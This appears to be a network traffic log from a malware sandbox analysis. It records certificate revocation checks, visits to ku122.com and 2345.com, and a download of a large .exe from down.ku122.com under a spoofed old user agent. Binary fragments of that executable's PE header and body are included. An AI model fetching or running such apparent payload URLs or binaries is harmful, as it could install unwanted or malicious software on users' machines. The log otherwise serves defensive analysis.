} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= HTTP/1.1

Cache-Control: max-age = 363986

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Sun, 17 Nov 2013 16:06:48 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1454

content-transfer-encoding: binary

Cache-Control: max-age=418698, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 22:02:17 GMT

Expires: Fri, 28 Apr 2017 22:02:17 GMT

Date: Mon, 24 Apr 2017 01:45:43 GMT

Connection: keep-alive

0..........0..... .....0......0...0........FC..&..<.0...Y......2017
0421220217Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._).
.a..%...0a.. ...M|......20170421220217Z....20170428220217Z0...*.H.....
.........n..o}4..........F... .,..9...o.g.3^.v=........L..^L...a.>.
..d.S..a.....Z...hS.<Q-..$. pL[... W....1'..].F......W.%...\.G./.3'
......:....6.....2...=."..AQ.[5%...._?:k..../..AFF6.........o.R3.2....
.|..<......b..j..6...rp....T...j3. .L...1..q.d.t....V..#..,.....0..
.0...0..4.......My_e.\....'....j0...*.H........0_1.0...U....US1.0...U.
...VeriSign, Inc.1705..U....Class 3 Public Primary Certification Autho
rity0...161122000000Z..171214235959Z0..1.0...U....US1.0...U....Symante
c Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Clas
s 3 PCA - G1 OCSP Responder Certificate 50.."0...*.H.............0....
.........4..IP.....B..h.....]..).]w.!"..a..{...="....._...~.s1.E......
.;...6&/...\2..A....\..T aH:.8lH^.....l.v.$...K=sZf.*.|.%.Pb.......B..
*f.T\w.:.s.... ....9..4..cV...3.qc.c..j<.f.....>1X.I...P%?......
...5R-....Ca14..X.U....u.....:.z.\.k..b.E.v..,.J................0..0..
.U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.c
om/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0
...U........0... .....0......0"..U....0...0.1.0...U....TGV-OFF-470...*
.H.............G..\..R.P..e]...N.....m.....4f......b4"8v..b.R....`.Auz
..........2=...@..........5..cWh....J......r...g.h......Kw'...j.@...x.
......

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= HTTP/1.1

Cache-Control: max-age = 418698

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Fri, 21 Apr 2017 22:02:17 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 304 Not Modified

Content-Type: application/ocsp-response

Expires: Fri, 28 Apr 2017 22:02:17 GMT

Last-Modified: Fri, 21 Apr 2017 22:02:17 GMT

Cache-Control: max-age=418698, public, no-transform, must-revalidate

Date: Mon, 24 Apr 2017 01:45:49 GMT

Connection: keep-alive

HTTP/1.1 304 Not Modified..Content-Type: application/ocsp-response..Ex
pires: Fri, 28 Apr 2017 22:02:17 GMT..Last-Modified: Fri, 21 Apr 2017 
22:02:17 GMT..Cache-Control: max-age=418698, public, no-transform, mus
t-revalidate..Date: Mon, 24 Apr 2017 01:45:49 GMT..Connection: keep-al
ive..

GET /CRL/Omniroot2025.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT

If-None-Match: "200da-5b6-4eb453c33260e"

User-Agent: Microsoft-CryptoAPI/6.1

Host: cdp1.public-trust.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/x-pkcs7-crl

Date: Mon, 24 Apr 2017 01:45:50 GMT

Etag: "200c0-d9f-54ce6d01eb69d"

Last-Modified: Tue, 11 Apr 2017 16:45:01 GMT

Server: ECS (fcn/418B)

X-Cache: HIT

Content-Length: 3487

0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U..
..CyberTrust1"0 ..U....Baltimore CyberTrust Root..170411160103Z..17070
7160103Z0...0....'k...120111220757Z0....'k...120111220847Z0....'.C..13
0130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140
212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..1004
14175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....10021
6203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208
175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...1101141
62156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0
.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...1
20111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..10
0414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101
208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..1103
02154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..10041
4175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714
160903Z0....'s...130123162633Z0....'....130904190524Z0....'....1310242
14319Z0....'....140129172435Z0....'....140129172453Z0....'....13102421
4310Z0....'....131101204601Z0....'....140219171632Z0....'.^..140409155
638Z0....'i...140709171930Z0....'/:..141119193302Z0....'J...1506031846
05Z0....'k...150603185020Z0....'k...150603185058Z0....'k...15060318513
1Z0....'k...120111220827Z0....'8...140716191203Z0....'....131219195909
Z0....'....140219171545Z0....'k...151105070000Z0....'q...160126173

<<< skipped >>>

GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1

Host: down.ku122.com

Accept: */*

Referer: hXXp://down.ku122.com/download/2345

User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Pragma: no-cache

Cache-Control: no-cache

Connection: close


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT

Accept-Ranges: bytes

ETag: "57869c6aa43d21:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:45:47 GMT

Connection: close

Content-Length: 107693056

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........P........
....*-................0.......0.......1.Y.....R.......B...............
........1.......4...............F.............Rich............PE..L...
.l.X.....................$\.....%........0....@.......................
....k...........@..................................-.......p1...9.....
..............k.....`5..8...........................x...@............0
...............................text...<........................... 
..`.rdata.......0....... ..............@..@.data..... ..P.......8.....
.........@....rsrc.....9..p1...9..$1.............@..@.reloc........k..
.....j.............@..B...............................................
......................................................................
......................................................................
......................................................................
...............................................VW.|$..t$..L$.U...S....
@..Q._..O..W.....1.!...(x.j.1.........n...1.!...*V...1.........n...1.!
...).p $1.........n...1.!... ....1.........n...1.!...(..|.1.........n.
..1.!...**..G1.........n...1.!...).F0.1.........n...1.!... ..F.1......
...n ..1.!...(...i1.........n$..1.!...*..D.1.........n(..1.!...).[..1.
........n,..1.!... ..\.1.........n0..1.!...("..k1.........n4..1.!...*.
q..1.........n8..1.!...).Cy.1.........n<..1.!... !..I1.........n...
..(b%..1.!..n.1............*@.@.1.!..n,1............)QZ^&1.!...1..

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ss.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1609

content-transfer-encoding: binary

Cache-Control: max-age=417137, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT

Expires: Fri, 28 Apr 2017 21:36:43 GMT

Date: Mon, 24 Apr 2017 01:45:49 GMT

Connection: keep-alive
0..E......>0..:.. .....0..... 0..'0......E ....e.u.....x..7....2017
0421213643Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....S.=......UMO4.O.....20170421213643Z....20170428213643Z0...*.H.....
........L.0....."......!.;[..8.Sa. D.......T.....F.g.....c.Hh_b"..LY .
..f<z.\...k.xG./J.r.i..K.T.8..Z..Q....].QT%9.....-R..4...V.|....f..
...;.....&..|....cW~.[O)..>..j7B..S.'VJ<6q....nG~.S.....z......`
tXU......HtBv.....8.<........\CMO.......a.?y......^.5U.......g)...n
0..j0..f0..N.......Dh.ciH.........!0...*.H........0~1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&
Symantec Class 3 Secure Server CA - G40...170204000000Z..170505235959Z
0@1>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Respond
er0.."0...*.H.............0......... B.}.@...E2.......&kg.#.c..7f#0...
.!....Z.G..|.o..W{2.m.l.cM...%......V.Wx6I.t....Q,U^......;.U<ie...
X.{.6. .4...ep....q..OuV...F...s.f....!....K....O....Oj.?Yd6^Mlw.6.k..
*./.......b..Q4...H.s.........(...toW...9...............&...D...{T{...
.....4.;/pa<...........0...0... .....0......0"..U....0...0.1.0...U.
...TGV-D-38570...U.#..0..._`.a.U..C..`*..z.C..0...U......E ....e.u....
.x..7..0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0...  hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H.............x..b5XG.........T^2.
....T..............zq.............f....#|.....P...R.....]...la.(.21{..
.C.....K.....R..H.b....3L..52}5.8.......%.......l=..$X$_..01.3....<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ss.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1609

content-transfer-encoding: binary

Cache-Control: max-age=417137, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT

Expires: Fri, 28 Apr 2017 21:36:43 GMT

Date: Mon, 24 Apr 2017 01:45:49 GMT

Connection: keep-alive
0..E......>0..:.. .....0..... 0..'0......E ....e.u.....x..7....2017
0421213643Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....S.=......UMO4.O.....20170421213643Z....20170428213643Z0...*.H.....
........L.0....."......!.;[..8.Sa. D.......T.....F.g.....c.Hh_b"..LY .
..f<z.\...k.xG./J.r.i..K.T.8..Z..Q....].QT%9.....-R..4...V.|....f..
...;.....&..|....cW~.[O)..>..j7B..S.'VJ<6q....nG~.S.....z......`
tXU......HtBv.....8.<........\CMO.......a.?y......^.5U.......g)...n
0..j0..f0..N.......Dh.ciH.........!0...*.H........0~1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&
Symantec Class 3 Secure Server CA - G40...170204000000Z..170505235959Z
0@1>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Respond
er0.."0...*.H.............0......... B.}.@...E2.......&kg.#.c..7f#0...
.!....Z.G..|.o..W{2.m.l.cM...%......V.Wx6I.t....Q,U^......;.U<ie...
X.{.6. .4...ep....q..OuV...F...s.f....!....K....O....Oj.?Yd6^Mlw.6.k..
*./.......b..Q4...H.s.........(...toW...9...............&...D...{T{...
.....4.;/pa<...........0...0... .....0......0"..U....0...0.1.0...U.
...TGV-D-38570...U.#..0..._`.a.U..C..`*..z.C..0...U......E ....e.u....
.x..7..0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0...  hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H.............x..b5XG.........T^2.
....T..............zq.............f....#|.....P...R.....]...la.(.21{..
.C.....K.....R..H.b....3L..52}5.8.......%.......l=..$X$_..01.3....<<< skipped >>>

GET /?k5209809 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://VVV.ku122.com/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.2345.com

Connection: Keep-Alive


HTTP/1.1 302 Temporarily Moved

Location: hXXps://VVV.2345.com/?k5209809

Accept-Ranges: bytes

Date: Mon, 24 Apr 2017 01:45:07 GMT

Age: 0

Connection: close

x-hits: 0

GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:36 GMT

Content-Type: application/ocsp-response

Content-Length: 1570

Connection: keep-alive

Set-Cookie: __cfduid=d87558bb0b78daf61edd900dfd3e337661492998336; expires=Tue, 24-Apr-18 01:45:36 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Sun, 23 Apr 2017 22:21:57 GMT

Expires: Thu, 27 Apr 2017 22:21:57 GMT

ETag: "4d85c93097530c8a95e29e6ae26f53ce0f5c35b3"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 35456250f68a4eea-DME
0..........0..... .....0......0...0.......M........u....%...G..2017042
3222157Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.&..)...x........20170423222157Z....20170427222157Z0...*.H............
.{j...TZ....>...H.]t.0^)Z?..3.......v.[...<o"9].y.1...D .Y.....k
jv...!e.K..k..p..~a|...=...F.]Uh...9 ..f!.....Z.]..n...<]......2W@.
....)9o...7I...;#..>.....q-.Y8.X....a...j...Sa....RLr2......9.qx...
....gY..........\/(.l.........o6..C.D.<*&..X8vhX;.I...........K0..G
0..C0.. .......o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....Gl
obalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SH
A256 - G20...170213071103Z..170516071103Z0..1.0...U....BE1.0...U....Gl
obalSign nv-sa1.0...U....2017021315051M0K..U...DGlobalSign Organizatio
n Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............
0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k...
....D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V
...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m
..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a......
..0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0
... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.gl
obalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..
............=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...
&..%....2...4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y.
..".2b....~...........E..U_..Y[....b.G'}..^-.....:.mo......=......<<< skipped >>>

GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:43 GMT

Content-Type: application/ocsp-response

Content-Length: 1570

Connection: keep-alive

Set-Cookie: __cfduid=d283bc54d4c5552efdeb8da9d437295161492998343; expires=Tue, 24-Apr-18 01:45:43 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Mon, 24 Apr 2017 00:37:42 GMT

Expires: Fri, 28 Apr 2017 00:37:42 GMT

ETag: "4fadf1178a8b6c14524f2bbe490f7f182022faab"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 3545627f41d04eea-DME
0..........0..... .....0......0...0.......M........u....%...G..2017042
4003742Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.9.!..N...=......20170424003742Z....20170428003742Z0...*.H............
.d.....A:B/........;u....-h./.Az..W..7D..}....n.........."n!.4.s.j....
yCONa.kLB.=.E.r..z.'.........'.4.PG..<j.............R4%.....G...V..
...&.7b..^F.Z..2....N.{[..E.S@..Cp...m6..C..bB.......i.HC=.1....a.'.c)
5....-......9=W....(2\6V.....cHmTZB.k.........Q.3....K0..G0..C0.. ....
...o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-
sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20..
.170213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-
sa1.0...U....2017021315051M0K..U...DGlobalSign Organization Validation
 CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C.
.0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.......
..u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V
..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~
..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U..
.....M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0..
....0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com
/repository/0...U...........0...U.%..0... .......0...*.H..............
=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...
4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~.
..........E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....N<<< skipped >>>

GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:49 GMT

Content-Type: application/ocsp-response

Content-Length: 1570

Connection: keep-alive

Set-Cookie: __cfduid=d0c7575d3859fe8a702672783a4f216661492998349; expires=Tue, 24-Apr-18 01:45:49 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Sun, 23 Apr 2017 23:44:24 GMT

Expires: Thu, 27 Apr 2017 23:44:24 GMT

ETag: "1af051037518cde9e06027456ab73813cdee0dd4"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 354562a613fd4eea-DME
0..........0..... .....0......0...0.......M........u....%...G..2017042
3234424Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.....S.."........20170423234424Z....20170427234424Z0...*.H............
...Qv.`op........XpR./3l..7...~....z@Z....i.tA .....z..\...6..X#.)..A.
...I....|..s.V"L..0[...{2...,.i.U[q.........|S.`.\:.L..3.{).~O.W.T-...
T...~.K$. ...pp..0#...../Z...@./@.b...Z.LSwhIl..#......2.....K....2m.|
....UF/...t.V(...i.D....(...NY.X..8P..(.U.........K0..G0..C0.. .......
o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1
<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...17
0213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1
.0...U....2017021315051M0K..U...DGlobalSign Organization Validation CA
 - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j
..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u
..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G
..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..W
b.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.....
..M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0.....
.0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/re
pository/0...U...........0...U.%..0... .......0...*.H..............=..
 {.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...4..
...f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~....
.......E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....NS.w<<< skipped >>>

GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1

Host: down.ku122.com

Accept: */*

Referer: hXXp://down.ku122.com/download/2345

User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Range: bytes=21538611-

Pragma: no-cache

Cache-Control: no-cache

Connection: close


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT

Accept-Ranges: bytes

ETag: "57869c6aa43d21:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:45:47 GMT

Connection: close

Content-Length: 86154445

Content-Range: bytes 21538611-107693055/107693056
Y.~...\...]....$"&.L..^.$..6......~.....u..:Hd... . ..............4.N.
Su.K.....{."..>..@......I.b...z2..q.>...Y.x;.\g\.T^....v..*@....
.B .....V..B.o.o.....&.F..Z..8.;.3.sw(.B?F.A.^.zz.Q...1...@..B.....1y.
.Ie...7..M...r.<..T0.-...y..5.j.a.,7S]r....k....?@..t..C.ug.P.I.}TM
.7.K.-..._.3>.......X.......I..............`> .9.]............`.
j.u...B.?..=R...X...X.|.xO:m......>..|;a.@$...ks[.Q.Y....>: ....
y.......[...aV.O.Qf...7..WC.F...;i....8..#.......&A.... #......pT...y.
..p.ZZg~.8s.-M...:....\...u.w..... ?.i..Q.....>u.......f.Z[....G.C.
......b.Zy.d.~..G"K(......6.^/.......y<N..y..<'?..UY..\.).j6qb-.
...W.$...8..2....f....6..8...u...s.N... <..L.>.n..f..U...S.*ZA.,
@..G.zE...L].<Y......n.Dz ...y....AI..`"..&G.....'..k.OE....f%}oN..
...z7....9........n......UI.Y...m....zg.I....~........_.6@...r.W... E.
.)S(Q^...H]G...~kD......D=7..&)...E....(.....|. . E.P~x.h..%...4;.....
N...N........z.:.....&W=..t'b.....W.1.....d..........'}."..[.Z...e.T..
...%....sas.L..3.`.\..o5...S...Es'..;%]fw.i..v..OY .)?...H......ED.G..
..?]..A.........5.5......'.t.#H~.......c..&/...G...W..z.....FG...p...K
F..ol.R>.x1.m.9..RUM.P.Y&V..xo..).#m.2G...mJ.D..B.Q.......a..Rg....
...KV.......b".GVz.G... :...zw.m....":uv.u..-X..`...;.CC.i.2.&....XG3.
J..;.YS[]>.=>..GWB..9Nh_.......K..8.:u........c.A\..P...j6pJ.lg.
.5.k.P...U...@.p.......{.....w.l_....G{kx).d#h..T.....O:.WQ.g......K..
.5....v....!5........A... `...4....S/............g..q..`.U|A. .....yiK
J/.C.|.S..f..J.U.s...U...*QN....h0E....9.,.G.......2n...h..OM....*<<< skipped >>>

GET / HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.ku122.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Fri, 06 Jan 2017 11:10:28 GMT

Accept-Ranges: bytes

ETag: "49ed27cd68d21:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:44:59 GMT

Content-Length: 549
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f..mW../Z...}tR
-.|.n?.....".(..'.}........[.~.....O|u....7. z....oN_....6...E...t..M.
~v1.....P..-....................W...._.;......7...w.;jt.`:.f...L.b....
..G?.]f.!.................8...t].M.Y..............>....?....t.....x
......Z..=....yx.........../.._.............o.........~.8.....mB.!.:..
....tg<]..=.z.Y...e..r.a~~0........x.."[....y.A/i._d.||^VU.....rV-.
.|k..*.i....u~....{.......wW(E...i.,.l........||............Y?...HTTP/
1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modi
fied: Fri, 06 Jan 2017 11:10:28 GMT..Accept-Ranges: bytes..ETag: "49ed
27cd68d21:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powe
red-By: ASP.NET..Date: Mon, 24 Apr 2017 01:44:59 GMT..Content-Length: 
549...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@..
....{....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f..mW../Z.
..}tR-.|.n?.....".(..'.}........[.~.....O|u....7. z....oN_....6...E...
t..M.~v1.....P..-....................W...._.;......7...w.;jt.`:.f...L.
b......G?.]f.!.................8...t].M.Y..............>....?....t.
....x......Z..=....yx.........../.._.............o.........~.8.....mB.
!.:......tg<]..=.z.Y...e..r.a~~0........x.."[....y.A/i._d.||^VU....
.rV-..|k..*.i....u~....{.......wW(E...i.,.l........||............Y?...
..<<< skipped >>>

GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:36 GMT

Content-Type: application/ocsp-response

Content-Length: 1570

Connection: keep-alive

Set-Cookie: __cfduid=d739c3d462e562b96772168363ac55d181492998336; expires=Tue, 24-Apr-18 01:45:36 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Sun, 23 Apr 2017 22:21:57 GMT

Expires: Thu, 27 Apr 2017 22:21:57 GMT

ETag: "4d85c93097530c8a95e29e6ae26f53ce0f5c35b3"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 35456250f35b4e42-DME
0..........0..... .....0......0...0.......M........u....%...G..2017042
3222157Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.&..)...x........20170423222157Z....20170427222157Z0...*.H............
.{j...TZ....>...H.]t.0^)Z?..3.......v.[...<o"9].y.1...D .Y.....k
jv...!e.K..k..p..~a|...=...F.]Uh...9 ..f!.....Z.]..n...<]......2W@.
....)9o...7I...;#..>.....q-.Y8.X....a...j...Sa....RLr2......9.qx...
....gY..........\/(.l.........o6..C.D.<*&..X8vhX;.I...........K0..G
0..C0.. .......o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....Gl
obalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SH
A256 - G20...170213071103Z..170516071103Z0..1.0...U....BE1.0...U....Gl
obalSign nv-sa1.0...U....2017021315051M0K..U...DGlobalSign Organizatio
n Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............
0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k...
....D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V
...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m
..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a......
..0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0
... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.gl
obalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..
............=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...
&..%....2...4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y.
..".2b....~...........E..U_..Y[....b.G'}..^-.....:.mo......=......<<< skipped >>>

GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:43 GMT

Content-Type: application/ocsp-response

Content-Length: 1570

Connection: keep-alive

